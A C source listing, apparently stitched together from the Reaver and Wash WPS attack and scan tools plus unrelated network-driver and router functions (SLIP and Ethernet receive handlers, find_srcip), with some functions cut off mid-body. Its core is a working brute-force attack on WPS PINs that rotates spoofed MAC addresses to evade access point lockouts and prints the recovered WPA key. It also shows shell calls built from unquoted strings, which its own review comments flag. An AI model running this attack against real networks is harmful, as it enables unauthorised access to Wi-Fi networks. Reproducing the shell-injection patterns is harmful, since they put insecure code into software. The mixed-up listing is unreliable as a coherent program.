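/*
 * Tune the capture interface to an 802.11 channel using the Linux
 * wireless-extensions ioctl SIOCSIWFREQ.
 *
 * channel: channel number; iw_float2freq() converts it into the request.
 *
 * Returns 1 when iw_set_ext() accepted the request (the new channel is then
 * recorded with set_channel()). Returns 0 when the socket could not be
 * opened, no interface is configured, or the ioctl was rejected.
 */
int change_channel(int channel)
{
	int skfd = 0, ret_val = 0;
	struct iwreq wrq;
	char *iface = NULL;

	memset(&wrq, 0, sizeof(wrq));

	/* Open NET socket */
	skfd = iw_sockets_open();
	if(skfd < 0)
	{
		perror("iw_sockets_open");
		return 0;
	}

	/* Read the interface name once so every use below sees the same value */
	iface = get_iface();
	if(iface)
	{
		/* Convert channel to a frequency */
		iw_float2freq((double) channel, &(wrq.u.freq));

		/* Fixed frequency */
		wrq.u.freq.flags = IW_FREQ_FIXED;

		cprintf(VERBOSE, "[+] Switching %s to channel %d\n", iface, channel);

		/* Set frequency */
		if(iw_set_ext(skfd, iface, SIOCSIWFREQ, &wrq) >= 0)
		{
			set_channel(channel);
			ret_val = 1;
		}
	}

	/*
	 * Close on every path. The socket used to be closed only inside the
	 * "interface is set" branch, so each call made without an interface
	 * leaked one descriptor.
	 */
	iw_sockets_close(skfd);

	return ret_val;
}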
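/*
 * Closes libpcap during sleep period to avoid stale packet data in pcap buffer,
 * then re-opens the capture on the configured interface.
 *
 * seconds: how long to sleep; values <= 0 make the call a no-op.
 *
 * On return the global handle is either a fresh capture handle or NULL
 * (re-initialisation failed and a CRITICAL message was printed).
 */
void pcap_sleep(int seconds)
{
	if(seconds <= 0)
	{
		return;
	}

	/*
	 * The handle is NULL if a previous call failed to re-open the interface.
	 * pcap_close() must not be given NULL, so only close a live handle.
	 */
	if(get_handle())
	{
		pcap_close(get_handle());
		set_handle(NULL);
	}

	sleep(seconds);

	set_handle(capture_init(get_iface()));
	if(!get_handle())
	{
		cprintf(CRITICAL, "[-] Failed to re-initialize interface '%s'\n", get_iface());
	}
}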
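/*
 * Given a destination ip address:
 *  - find interface the packet would be shipped through
 *  - return this interface's ip address as the src ip address
 *
 * dest: destination address, stored unchanged into in_addr.s_addr.
 *
 * Returns the ip field of the outgoing interface, or 0 when get_next_hop()
 * reports failure (non-zero return) or the named interface cannot be found.
 * The interface list and routing table are read-locked for the lookup.
 */
uint32_t find_srcip(uint32_t dest)
{
	enum { IFACE_NAME_LEN = 32 };

	struct sr_instance* sr = sr_get_global_instance(0);
	router_state* rs = (router_state*)sr->interface_subsystem;
	iface_entry* iface_struct;
	/*
	 * Stack buffer instead of calloc(): the heap buffer was never freed
	 * (one leak per call) and its allocation was never checked.
	 */
	char iface[IFACE_NAME_LEN] = {0};
	struct in_addr dst;
	struct in_addr src;
	uint32_t srcip = 0;

	dst.s_addr = dest;
	src.s_addr = 0;

	lock_if_list_rd(rs);
	lock_rtable_rd(rs);

	if(!get_next_hop(&src, iface, IFACE_NAME_LEN, rs, &dst))
	{
		iface_struct = get_iface(rs, iface);
		assert(iface_struct);
		/* assert() compiles away under NDEBUG; do not dereference NULL there */
		if(iface_struct)
		{
			srcip = iface_struct->ip;
		}
	}

	unlock_rtable(rs);
	unlock_if_list(rs);

	return srcip;
}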
/*
 * Take one packet from slip_poll_handler() and pass it to net_recv_data() on
 * the interface that get_iface() selects for the packet's VLAN tag.
 *
 * Nothing happens when the poll handler returns no packet or a packet without
 * fragments. If net_recv_data() rejects the packet it is unreferenced here.
 * The context's rx and last pointers are cleared afterwards in either case.
 */
static void process_msg(struct slip_context *slip)
{
	struct net_pkt *pkt;
	u16_t vlan_tag = NET_VLAN_TAG_UNSPEC;
	int rc;

	pkt = slip_poll_handler(slip);
	if (pkt == NULL || pkt->frags == NULL) {
		return;
	}

#if defined(CONFIG_NET_VLAN)
	{
		struct net_eth_hdr *eth_hdr = NET_ETH_HDR(pkt);

		/* Tagged frame: copy the TCI into the packet, then read the tag back */
		if (ntohs(eth_hdr->type) == NET_ETH_PTYPE_VLAN) {
			struct net_eth_vlan_hdr *tagged_hdr =
				(struct net_eth_vlan_hdr *)NET_ETH_HDR(pkt);

			net_pkt_set_vlan_tci(pkt, ntohs(tagged_hdr->vlan.tci));
			vlan_tag = net_pkt_vlan_tag(pkt);
		}
	}
#endif

	rc = net_recv_data(get_iface(slip, vlan_tag), pkt);
	if (rc < 0) {
		/* The stack did not take the packet, so drop our reference */
		net_pkt_unref(pkt);
	}

	slip->rx = NULL;
	slip->last = NULL;
}
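/*
 * Populates globule->mac with the MAC address of the interface globule->iface
 *
 * The address is obtained with the SIOCGIFHWADDR ioctl on a throw-away
 * datagram socket and stored through set_mac().
 *
 * Returns 1 on success; 0 when no interface is configured, the interface
 * name does not fit in ifr_name, the socket cannot be created, or the ioctl
 * fails.
 */
int read_iface_mac()
{
	struct ifreq ifr;
	const char *iface = get_iface();
	int sock = 0, ret_val = 0;

	/*
	 * Reject a missing or over-long name instead of copying it: strncpy()
	 * with the full IFNAMSIZ left ifr_name unterminated for long names, and
	 * a silently truncated name could address a different interface.
	 */
	if(!iface || strlen(iface) >= IFNAMSIZ)
	{
		return 0;
	}

	/* Need a socket for the ioctl call */
	sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP);
	if(sock == -1)
	{
		return 0;
	}

	/* Prepare request; the memset supplies the terminating NUL */
	memset(&ifr, 0, sizeof(ifr));
	strncpy(ifr.ifr_name, iface, IFNAMSIZ - 1);

	/* Do it */
	if(ioctl(sock, SIOCGIFHWADDR, &ifr) == 0)
	{
		set_mac((unsigned char *) &ifr.ifr_hwaddr.sa_data);
		ret_val = 1;
	}

	close(sock);

	return ret_val;
}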
/*
 * Read one frame from fd into ctx->recv, wrap it in a net_pkt and deliver it
 * to the interface chosen by get_iface() for the frame's VLAN tag.
 *
 * Returns 0 when nothing was read and after the packet was handed to
 * net_recv_data() (whether accepted or dropped); returns the status set by
 * the prepare_*_pkt() helper when that helper produced no packet.
 *
 * NOTE(review): with CONFIG_NET_VLAN the EtherType is read from ctx->recv
 * before count is compared with the Ethernet header size. Whether the
 * prepare_*_pkt() helpers validate the length is not visible here; confirm.
 */
static int read_data(struct eth_context *ctx, int fd)
{
	struct net_pkt *pkt = NULL;
	struct net_if *iface;
	u16_t vlan_tag = NET_VLAN_TAG_UNSPEC;
	int status;
	int count = eth_read_data(fd, ctx->recv, sizeof(ctx->recv));

	if (count <= 0) {
		return 0;
	}

#if defined(CONFIG_NET_VLAN)
	{
		struct net_eth_hdr *hdr = (struct net_eth_hdr *)(ctx->recv);
		int tagged = (ntohs(hdr->type) == NET_ETH_PTYPE_VLAN);

		if (tagged) {
			pkt = prepare_vlan_pkt(ctx, count, &vlan_tag, &status);
		} else {
			pkt = prepare_non_vlan_pkt(ctx, count, &status);
		}

		if (!pkt) {
			return status;
		}

		/* Untagged frames get an explicit zero TCI */
		if (!tagged) {
			net_pkt_set_vlan_tci(pkt, 0);
		}
	}
#else
	{
		pkt = prepare_non_vlan_pkt(ctx, count, &status);
		if (!pkt) {
			return status;
		}
	}
#endif

	iface = get_iface(ctx, vlan_tag);

	update_gptp(iface, pkt, false);

	/* The stack did not take the packet, so drop our reference */
	if (net_recv_data(iface, pkt) < 0) {
		net_pkt_unref(pkt);
	}

	return 0;
}
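/*
 * Switch the wireless interface to the given channel by running Apple's
 * "airport" helper in a child process and waiting for it to finish.
 *
 * The helper is started with execve() on a fixed absolute path and an
 * explicit argument vector, so no shell interprets the argument.
 *
 * Always returns 0, as the original did. Note that this differs from the
 * wireless-extensions variant of change_channel(), which returns 1 on
 * success.
 */
int change_channel(int channel)
{
	static char airport_path[] = "/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport";
	char chan_arg[32];
	pid_t pid;
	int status = 0;

	cprintf(VERBOSE, "[+] Switching %s to channel %d\n", get_iface(), channel);

	// Unfortunately, there is no API to change the channel
	snprintf(chan_arg, sizeof(chan_arg), "-c%d", channel);

	pid = fork();
	if (pid < 0) {
		/*
		 * Nothing was started. waitpid(-1, ...) would reap an unrelated
		 * child, and the channel did not change, so leave the state alone.
		 */
		perror("fork");
		return 0;
	}

	if (pid == 0) {
		char* argv[] = {airport_path, chan_arg, NULL};
		execve(airport_path, argv, NULL);
		/*
		 * Only reached when execve() failed. Without this exit the child
		 * fell through and kept running the parent's code as a second copy
		 * of the program.
		 */
		_exit(127);
	}

	waitpid(pid, &status, 0);

	/* NOTE(review): the helper's exit status is not checked before the new
	 * channel is recorded; its exit-code convention is not visible here. */
	set_channel(channel);
	return 0;
}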
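/*
 * Look up the link-layer (AF_LINK) address of the configured interface with
 * getifaddrs() and store it through set_mac().
 *
 * Returns 1 when a matching entry was found, 0 when no interface is
 * configured, getifaddrs() failed, or no entry matched.
 */
int read_iface_mac()
{
	struct ifaddrs* iflist = NULL;
	struct ifaddrs* cur;
	const char *iface = get_iface();
	int found = 0;

	if (!iface || getifaddrs(&iflist) != 0) {
		return 0;
	}

	for (cur = iflist; cur; cur = cur->ifa_next) {
		/*
		 * ifa_addr may be NULL for some entries. The original tested it
		 * only after already reading ifa_addr->sa_family.
		 */
		if (!cur->ifa_addr || cur->ifa_addr->sa_family != AF_LINK) {
			continue;
		}

		if (strcmp(cur->ifa_name, iface) != 0) {
			continue;
		}

		struct sockaddr_dl* sdl = (struct sockaddr_dl*)cur->ifa_addr;
		set_mac(LLADDR(sdl));
		found = 1;
		break;
	}

	freeifaddrs(iflist);

	return found;
}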
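/*
 * Front-end driver: initialise global state, parse the command line, validate
 * the required settings, run crack() and report the outcome.
 *
 * Returns EXIT_SUCCESS only when the key status is KEY_DONE after crack()
 * returns. Returns whatever reaver_usage() returns when there are too few
 * arguments or process_arguments() fails. Returns EXIT_FAILURE otherwise.
 * globule_deinit() runs on every exit path.
 */
int reaver_main(int argc, char **argv)
{
	int ret_val = EXIT_FAILURE, r = 0;
	time_t start_time = 0, end_time = 0;
	struct wps_data *wps = NULL;

	globule_init();
	init_default_settings();

	fprintf(stderr, "\nReaver v%s WiFi Protected Setup Attack Tool\n", get_version());
	fprintf(stderr, "Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <*****@*****.**>\n\n");

	if(argc < 2)
	{
		ret_val = reaver_usage(argv[0]);
		goto end;
	}

	/* Process the command line arguments */
	if(process_arguments(argc, argv) == EXIT_FAILURE)
	{
		ret_val = reaver_usage(argv[0]);
		goto end;
	}

	/* Double check reaver_usage */
	if(!get_iface() || (memcmp(get_bssid(), NULL_MAC, MAC_ADDR_LEN) == 0))
	{
		reaver_usage(argv[0]);
		goto end;
	}

	/* If no MAC address was provided, get it ourselves */
	if(memcmp(get_mac(), NULL_MAC, MAC_ADDR_LEN) == 0)
	{
		if(!read_iface_mac())
		{
			fprintf(stderr, "[-] Failed to retrieve a MAC address for interface '%s'!\n", get_iface());
			goto end;
		}
	}

	/* Sanity checking on the message timeout value */
	if(get_m57_timeout() > M57_MAX_TIMEOUT)
	{
		set_m57_timeout(M57_MAX_TIMEOUT);
	}
	else if(get_m57_timeout() <= 0)
	{
		set_m57_timeout(M57_DEFAULT_TIMEOUT);
	}

	/* Sanity checking on the receive timeout value */
	if(get_rx_timeout() <= 0)
	{
		set_rx_timeout(DEFAULT_TIMEOUT);
	}

	/* Initialize signal handlers */
	sigint_init();
	sigalrm_init();

	/* Mark the start time */
	start_time = time(NULL);

	/* Do it. */
	crack();

	/* Mark the end time */
	end_time = time(NULL);

	/* Check our key status */
	if(get_key_status() == KEY_DONE)
	{
		wps = get_wps();

		cprintf(VERBOSE, "[+] Pin cracked in %d seconds\n", (int) (end_time - start_time));
		cprintf(CRITICAL, "[+] WPS PIN: '%s'\n", get_pin());

		/* get_wps() may hand back NULL; guard before reading its fields */
		if(wps && wps->key)
		{
			cprintf(CRITICAL, "[+] WPA PSK: '%s'\n", wps->key);
		}
		if(wps && wps->essid)
		{
			cprintf(CRITICAL, "[+] AP SSID: '%s'\n", wps->essid);
		}

		/*
		 * Run user-supplied command.
		 *
		 * SECURITY: system() passes the string to the shell with this
		 * process's privileges. The value must come only from the
		 * operator's own command line, never from captured or saved data.
		 * NOTE(review): where the exec string is set is not visible here;
		 * confirm against its setter.
		 */
		if(get_exec_string())
		{
			r = system(get_exec_string());
			if(r == -1)
			{
				perror("system");
			}
		}

		ret_val = EXIT_SUCCESS;
	}
	else
	{
		cprintf(CRITICAL, "[-] Failed to recover WPA key\n");
	}

	save_session();

end:
	globule_deinit();
	return ret_val;
}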
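/*
 * Entry point of the scan tool: parse options, pick the capture source (one
 * live interface or one or more pcap files), install the packet filter and
 * run monitor() on each source.
 *
 * Returns EXIT_SUCCESS after all sources were processed, EXIT_FAILURE on a
 * usage error or when a capture source, output file or filter could not be
 * set up.
 */
int main(int argc, char *argv[])
{
	int c = 0;
	FILE *fp = NULL;
	int long_opt_index = 0, i = 0, channel = 0, passive = 0, mode = 0;
	int source = INTERFACE, ret_val = EXIT_FAILURE;
	int filter_rc = 0;
	struct bpf_program bpf = { 0 };
	char *out_file = NULL, *last_optarg = NULL, *target = NULL, *bssid = NULL;
	char *short_options = "i:c:n:o:b:5sfuCDh";
	struct option long_options[] = {
		{ "bssid", required_argument, NULL, 'b' },
		{ "interface", required_argument, NULL, 'i' },
		{ "channel", required_argument, NULL, 'c' },
		{ "out-file", required_argument, NULL, 'o' },
		{ "probes", required_argument, NULL, 'n' },
		{ "daemonize", no_argument, NULL, 'D' },
		{ "file", no_argument, NULL, 'f' },
		{ "ignore-fcs", no_argument, NULL, 'C' },
		{ "5ghz", no_argument, NULL, '5' },
		{ "scan", no_argument, NULL, 's' },
		{ "survey", no_argument, NULL, 'u' },
		{ "help", no_argument, NULL, 'h' },
		{ 0, 0, 0, 0 }
	};

	fprintf(stderr, "\nWash v%s WiFi Protected Setup Scan Tool\n", PACKAGE_VERSION);
	fprintf(stderr, "Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <*****@*****.**>\n\n");

	globule_init();
	sql_init();
	create_ap_table();
	set_auto_channel_select(0);
	set_wifi_band(BG_BAND);
	set_debug(INFO);
	set_validate_fcs(1);
	set_log_file(stdout);
	set_max_num_probes(DEFAULT_MAX_NUM_PROBES);

	while((c = getopt_long(argc, argv, short_options, long_options, &long_opt_index)) != -1)
	{
		switch(c)
		{
			case 'f':
				source = PCAP_FILE;
				break;
			case 'i':
				set_iface(optarg);
				break;
			case 'b':
				bssid = strdup(optarg);
				break;
			case 'c':
				/* NOTE(review): atoi() cannot report malformed input; a non-numeric value becomes 0 */
				channel = atoi(optarg);
				set_fixed_channel(1);
				break;
			case '5':
				set_wifi_band(AN_BAND);
				break;
			case 'n':
				set_max_num_probes(atoi(optarg));
				break;
			case 'o':
				out_file = strdup(optarg);
				break;
			case 's':
				mode = SCAN;
				break;
			case 'u':
				mode = SURVEY;
				break;
			case 'C':
				set_validate_fcs(0);
				break;
			case 'D':
				daemonize();
				break;
			default:
				usage(argv[0]);
				goto end;
		}

		/* Track the last optarg. This is used later when looping back through any specified pcap files. */
		if(optarg)
		{
			free(last_optarg);
			last_optarg = strdup(optarg);
		}
	}

	/* The interface value won't be set if capture files were specified; else, there should have been an interface specified */
	if(!get_iface() && source != PCAP_FILE)
	{
		usage(argv[0]);
		goto end;
	}

	if(get_iface() && source == PCAP_FILE)
	{
		cprintf(CRITICAL, "[X] ERROR: -i and -f options cannot be used together.\n");
		usage(argv[0]);
		goto end;
	}

	/* If we're reading from a file, be sure we don't try to transmit probe requests */
	if(source == PCAP_FILE)
	{
		passive = 1;
	}

	/* Open the output file, if any. If none, write to stdout. */
	if(out_file)
	{
		fp = fopen(out_file, "wb");
		if(!fp)
		{
			cprintf(CRITICAL, "[X] ERROR: Failed to open '%s' for writing\n", out_file);
			goto end;
		}

		set_log_file(fp);
	}

	/*
	 * Loop through all of the specified capture sources. If an interface was specified, this will only loop once and the
	 * call to monitor() will block indefinitely. If capture files were specified, this will loop through each file specified
	 * on the command line and monitor() will return after each file has been processed.
	 */
	for(i=argc-1; i>0; i--)
	{
		/* If the source is a pcap file, get the file name from the command line */
		if(source == PCAP_FILE)
		{
			/*
			 * If we've gotten to the arguments, we're done.
			 * strncmp() stops at the end of argv[i]; the memcmp() used before
			 * could read past a shorter argument.
			 */
			if((argv[i][0] == '-') ||
			   (last_optarg && (strncmp(argv[i], last_optarg, strlen(last_optarg)) == 0)))
			{
				break;
			}
			else
			{
				target = argv[i];
			}
		}
		/* Else, use the specified interface name */
		else
		{
			target = get_iface();
		}

		set_handle(capture_init(target));
		if(!get_handle())
		{
			/* Report the source that failed; get_iface() is NULL when reading pcap files */
			cprintf(CRITICAL, "[X] ERROR: Failed to open '%s' for capturing\n", target);
			goto end;
		}

		if(pcap_compile(get_handle(), &bpf, PACKET_FILTER, 0, 0) != 0)
		{
			cprintf(CRITICAL, "[X] ERROR: Failed to compile packet filter\n");
			goto end;
		}

		/* The compiled program is no longer needed once it has been offered to the handle */
		filter_rc = pcap_setfilter(get_handle(), &bpf);
		pcap_freecode(&bpf);
		if(filter_rc != 0)
		{
			cprintf(CRITICAL, "[X] ERROR: Failed to set packet filter\n");
			goto end;
		}

		/* Do it. */
		monitor(bssid, passive, source, channel, mode);
		printf("\n");
	}

	ret_val = EXIT_SUCCESS;

end:
	globule_deinit();
	sql_cleanup();
	free(bssid);
	free(out_file);
	free(last_optarg);
	if(wpsmon.fp) fclose(wpsmon.fp);

	return ret_val;
}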
/*
 * Handle one captured frame: skip it when it is shorter than MIN_BEACON_SIZE
 * or is_target() rejects it, record its BSSID, optionally retune once to the
 * AP's channel when a target was given, parse WPS parameters from beacons and
 * probe responses, store the AP with insert()/update(), and print one result
 * row for newly inserted WPS-enabled APs.
 *
 * packet/header: frame bytes and pcap metadata as delivered by libpcap.
 * target:        BSSID string to restrict to, or NULL for all.
 * passive:       non-zero suppresses probe requests.
 * mode, source:  compared against SCAN and PCAP_FILE below.
 *
 * The listing ends before the function does; the remaining closing braces and
 * the `end:` label targeted by the gotos are not part of this excerpt.
 */
void parse_wps_settings(const u_char *packet, struct pcap_pkthdr *header, char *target, int passive, int mode, int source)
{
	struct radio_tap_header *rt_header = NULL;
	struct dot11_frame_header *frame_header = NULL;
	struct libwps_data *wps = NULL;
	enum encryption_type encryption = NONE;
	char *bssid = NULL, *ssid = NULL, *lock_display = NULL;
	int wps_parsed = 0, probe_sent = 0, channel = 0, rssi = 0;
	static int channel_changed = 0;

	char info_manufac[500];
	char info_modelnum[500];
	char info_modelserial[500];

	/* NOTE(review): the malloc() result goes straight into memset() with no NULL check */
	wps = malloc(sizeof(struct libwps_data));
	memset(wps, 0, sizeof(struct libwps_data));

	/* NOTE(review): the size test uses header->len (length on the wire), not
	 * header->caplen (bytes actually captured); confirm the two cannot differ here */
	if(packet == NULL || header == NULL || header->len < MIN_BEACON_SIZE)
	{
		goto end;
	}

	/* NOTE(review): rt_header->len comes from the captured frame itself and is
	 * added to packet without a visible bound against header->len; confirm that
	 * radio_header() validates it */
	rt_header = (struct radio_tap_header *) radio_header(packet, header->len);
	frame_header = (struct dot11_frame_header *) (packet + rt_header->len);

	/* If a specific BSSID was specified, only parse packets from that BSSID */
	if(!is_target(frame_header))
	{
		goto end;
	}

	set_ssid(NULL);
	bssid = (char *) mac2str(frame_header->addr3, ':');
	set_bssid((unsigned char *) frame_header->addr3);

	if(bssid)
	{
		if((target == NULL) ||
		   (target != NULL && strcmp(bssid, target) == 0))
		{
			channel = parse_beacon_tags(packet, header->len);
			rssi = signal_strength(packet, header->len);
			ssid = (char *) get_ssid();

			/* Retune once per process (static flag) to the channel announced by the target */
			if(target != NULL && channel_changed == 0)
			{
				ualarm(0, 0);
				change_channel(channel);
				channel_changed = 1;
			}

			if(frame_header->fc.sub_type == PROBE_RESPONSE ||
			   frame_header->fc.sub_type == SUBTYPE_BEACON)
			{
				wps_parsed = parse_wps_parameters(packet, header->len, wps);
			}

			if(!is_done(bssid) && (get_channel() == channel || source == PCAP_FILE))
			{
				if(frame_header->fc.sub_type == SUBTYPE_BEACON &&
				   mode == SCAN &&
				   !passive &&
				   should_probe(bssid))
				{
					send_probe_request(get_bssid(), get_ssid());
					probe_sent = 1;
				}

				if(!insert(bssid, ssid, wps, encryption, rssi))
				{
					update(bssid, ssid, wps, encryption);
				}
				else if(wps->version > 0)
				{
					/* NOTE(review): lock_display stays NULL for any other value of wps->locked
					 * and is later printed with %s */
					switch(wps->locked)
					{
						case WPSLOCKED:
							lock_display = YES;
							break;
						case UNLOCKED:
						case UNSPECIFIED:
							lock_display = NO;
							break;
					}

					//ideas made by kcdtv
					if(get_chipset_output == 1)
					//if(1)
					{
						if (c_fix == 0)
						{
							//no use a fixed channel
							cprintf(INFO,"Option (-g) REQUIRES a channel to be set with (-c)\n");
							exit(0);
						}

						FILE *fgchipset=NULL;
						char cmd_chipset[4000];
						char cmd_chipset_buf[4000];
						char buffint[5];

						char *aux_cmd_chipset=NULL;

						memset(cmd_chipset, 0, sizeof(cmd_chipset));
						memset(cmd_chipset_buf, 0, sizeof(cmd_chipset_buf));
						memset(info_manufac, 0, sizeof(info_manufac));
						memset(info_modelnum, 0, sizeof(info_modelnum));
						memset(info_modelserial, 0, sizeof(info_modelserial));

						/*
						 * SECURITY NOTE(review): the command is assembled with unbounded
						 * strcat() calls and then run through the shell by popen(). The
						 * interface name is inserted unquoted, so shell metacharacters in
						 * it would be interpreted, and nothing limits its length against
						 * the 4000-byte buffer. An explicit argument vector
						 * (fork + exec, or posix_spawn) would avoid the shell entirely.
						 */
						strcat(cmd_chipset,"reaver -0 -s y -vv -i "); //need option to stop reaver in m1 stage
						strcat(cmd_chipset,get_iface());

						strcat(cmd_chipset, " -b ");
						/* NOTE(review): the string returned by mac2str() is not kept, so it
						 * cannot be released here if it is heap-allocated */
						strcat(cmd_chipset, mac2str(get_bssid(),':'));

						strcat(cmd_chipset," -c ");
						/* snprintf() bounds the write; a value needing more than 4 characters is truncated */
						snprintf(buffint, sizeof(buffint), "%d",channel);
						strcat(cmd_chipset, buffint);

						//cprintf(INFO,"\n%s\n",cmd_chipset);

						/* NOTE(review): a failed popen() is only reported; the fgets() loop
						 * and pclose() below are still reached with fgchipset == NULL */
						if ((fgchipset = popen(cmd_chipset, "r")) == NULL) {
							printf("Error opening pipe!\n");
							//return -1;
						}

						while (fgets(cmd_chipset_buf, 4000, fgchipset) != NULL)
						{
							//[P] WPS Manufacturer: xxx
							//[P] WPS Model Number: yyy
							//[P] WPS Model Serial Number: zzz
							//cprintf(INFO,"\n%s\n",cmd_chipset_buf);

							/*
							 * NOTE(review): strncpy() with the full destination size writes no
							 * terminating NUL when the remainder of the line is 500 bytes or
							 * longer (lines may be up to 3999 bytes). The strcspn() calls
							 * after the loop would then scan past the array. The copied text
							 * is the child process's output, which presumably reflects fields
							 * sent by the access point; treat it as untrusted.
							 */
							aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Manufacturer:");
							if(aux_cmd_chipset != NULL)
							{
								//bug fix by alxchk
								strncpy(info_manufac, aux_cmd_chipset+21, sizeof(info_manufac));
							}

							aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Number:");
							if(aux_cmd_chipset != NULL)
							{
								//bug fix by alxchk
								strncpy(info_modelnum, aux_cmd_chipset+21, sizeof(info_modelnum));
							}

							aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Serial Number:");
							if(aux_cmd_chipset != NULL)
							{
								//bug fix by alxchk
								strncpy(info_modelserial, aux_cmd_chipset+28, sizeof(info_modelserial));
							}
						}

						//cprintf(INFO,"\n%s\n",info_manufac);
						/* Cut each captured value at its first newline */
						info_manufac[strcspn ( info_manufac, "\n" )] = '\0';
						info_modelnum[strcspn ( info_modelnum, "\n" )] = '\0';
						info_modelserial[strcspn ( info_modelserial, "\n" )] = '\0';

						/* The child's exit status is read but deliberately ignored */
						if(pclose(fgchipset)) {
							//printf("Command not found or exited with error status\n");
							//return -1;
						}
					}

					/* Two output layouts: space-separated columns, or '|'-separated fields
					 * (with the three chipset fields appended when they were collected) */
					if (o_file_p == 0)
					{
						cprintf(INFO, "%17s %2d %.2d %d.%d %s %s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid);
					}
					else
					{
						if(get_chipset_output == 1)
						{
							cprintf(INFO, "%17s|%2d|%.2d|%d.%d|%s|%s|%s|%s|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid, info_manufac, info_modelnum, info_modelserial);
						}else
						{
							cprintf(INFO, "%17s|%2d|%.2d|%d.%d|%s|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid);
						}
					}
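/*
 * Brute force all possible WPS pins for a given access point
 *
 * Opens the capture interface, waits for a beacon from the configured BSSID,
 * associates, and then loops over the pin list until the key status becomes
 * KEY_DONE, a pin or WPS structure cannot be built, or the configured maximum
 * number of attempts is reached. Session state is saved and progress shown
 * every DISPLAY_PIN_COUNT iterations.
 *
 * Returns nothing; the outcome is read by the caller through
 * get_key_status(), get_pin() and get_wps(). The BSSID string and the capture
 * handle are released on every path taken after the interface was opened.
 */
void crack()
{
	static const char hex_digits[] = "0123456789ABCDEF";
	unsigned char *bssid = NULL;
	char *pin = NULL;
	int fail_count = 0, loop_count = 0, sleep_count = 0, assoc_fail_count = 0;
	float pin_count = 0;
	time_t start_time = 0;
	enum wps_result result = 0;
	/* MAC CHANGER VARIABLES */
	int mac_changer_counter = 0;
	char mac[MAC_ADDR_LEN] = { 0 };
	unsigned char mac_string [] = "ZZ:ZZ:ZZ:ZZ:ZZ:ZZ";
	unsigned char* new_mac = &mac_string[0];
	char last_digit = '0';

	if(!get_iface())
	{
		return;
	}

	if(get_max_pin_attempts() == -1)
	{
		cprintf(CRITICAL, "[X] ERROR: This device has been blacklisted and is not supported.\n");
		return;
	}

	/* Initialize network interface */
	set_handle(capture_init(get_iface()));
	if(get_handle() == NULL)
	{
		cprintf(CRITICAL, "[-] Failed to initialize interface '%s'\n", get_iface());
		return;
	}

	generate_pins();

	/* Restore any previously saved session */
	if(get_static_p1() == NULL)
	{
		restore_session();
	}

	/* Convert BSSID to a string */
	bssid = mac2str(get_bssid(), ':');

	/*
	 * We need to get some basic info from the AP, and also want to make sure the target AP
	 * actually exists, so wait for a beacon packet
	 */
	cprintf(INFO, "[+] Waiting for beacon from %s\n", bssid);
	read_ap_beacon();
	process_auto_options();

	/*
	 * I'm fairly certain there's a reason I put this in twice. Can't remember what it was now though...
	 * This exit used to return directly, leaving the BSSID string allocated
	 * and the capture handle open; it now goes through the common cleanup.
	 */
	if(get_max_pin_attempts() == -1)
	{
		cprintf(CRITICAL, "[X] ERROR: This device has been blacklisted and is not supported.\n");
		goto out;
	}

	/* This initial association is just to make sure we can successfully associate */
	while(!reassociate())
	{
		if(assoc_fail_count == MAX_ASSOC_FAILURES)
		{
			assoc_fail_count = 0;
			cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
		}
		else
		{
			assoc_fail_count++;
		}
	}
	cprintf(INFO, "[+] Associated with %s (ESSID: %s)\n", bssid, get_ssid());

	/* Used to calculate pin attempt rates */
	start_time = time(NULL);

	/* If the key status hasn't been explicitly set by restore_session(), ensure that it is set to KEY1_WIP */
	if(get_key_status() <= KEY1_WIP)
	{
		set_key_status(KEY1_WIP);
	}
	/*
	 * If we're starting a session at KEY_DONE, that means we've already cracked the pin and the AP is being re-attacked.
	 * Re-set the status to KEY2_WIP so that we properly enter the main cracking loop.
	 */
	else if(get_key_status() == KEY_DONE)
	{
		set_key_status(KEY2_WIP);
	}

	//copy the current mac to the new_mac variable for mac changer
	if(get_mac_changer() == 1)
	{
		/* mac2str() returns an allocated string (bssid above is freed the same way) */
		unsigned char *cur_mac = mac2str(get_mac(), ':');

		if(cur_mac)
		{
			strncpy((char *) new_mac, (char *) cur_mac, 16);
			free(cur_mac);
		}
	}

	/* Main cracking loop */
	for(loop_count=0, sleep_count=0; get_key_status() != KEY_DONE; loop_count++, sleep_count++)
	{
		//MAC Changer: define the last mac address digit
		if(get_mac_changer() == 1)
		{
			unsigned char *shown_mac = NULL;

			/* Counter cycles 0..15; the table replaces a 16-case switch */
			last_digit = hex_digits[mac_changer_counter];
			mac_changer_counter = (mac_changer_counter + 1) % 16;

			new_mac[16] = last_digit;
			//transform the string to a MAC and define the MAC
			str2mac((unsigned char *) new_mac, (unsigned char *) &mac);
			set_mac((unsigned char *) &mac);

			/* Free the formatted string after printing; it leaked once per iteration before */
			shown_mac = mac2str(get_mac(), ':');
			if(shown_mac)
			{
				cprintf(WARNING, "[+] Using MAC %s \n", shown_mac);
				free(shown_mac);
			}
		}

		/*
		 * Some APs may do brute force detection, or might not be able to handle an onslaught of WPS
		 * registrar requests. Using a delay here can help prevent the AP from locking us out.
		 */
		pcap_sleep(get_delay());

		/* Users may specify a delay after x number of attempts */
		if((get_recurring_delay() > 0) && (sleep_count == get_recurring_delay_count()))
		{
			cprintf(VERBOSE, "[+] Entering recurring delay of %d seconds\n", get_recurring_delay());
			pcap_sleep(get_recurring_delay());
			sleep_count = 0;
		}

		/*
		 * Some APs identify brute force attempts and lock themselves for a short period of time (typically 5 minutes).
		 * Verify that the AP is not locked before attempting the next pin.
		 */
		while(get_ignore_locks() == 0 && is_wps_locked())
		{
			cprintf(WARNING, "[!] WARNING: Detected AP rate limiting, waiting %d seconds before re-checking\n", get_lock_delay());
			pcap_sleep(get_lock_delay());
		}

		/* Initialize wps structure */
		set_wps(initialize_wps_data());
		if(!get_wps())
		{
			cprintf(CRITICAL, "[-] Failed to initialize critical data structure\n");
			break;
		}

		/* Try the next pin in the list */
		pin = build_next_pin();
		if(!pin)
		{
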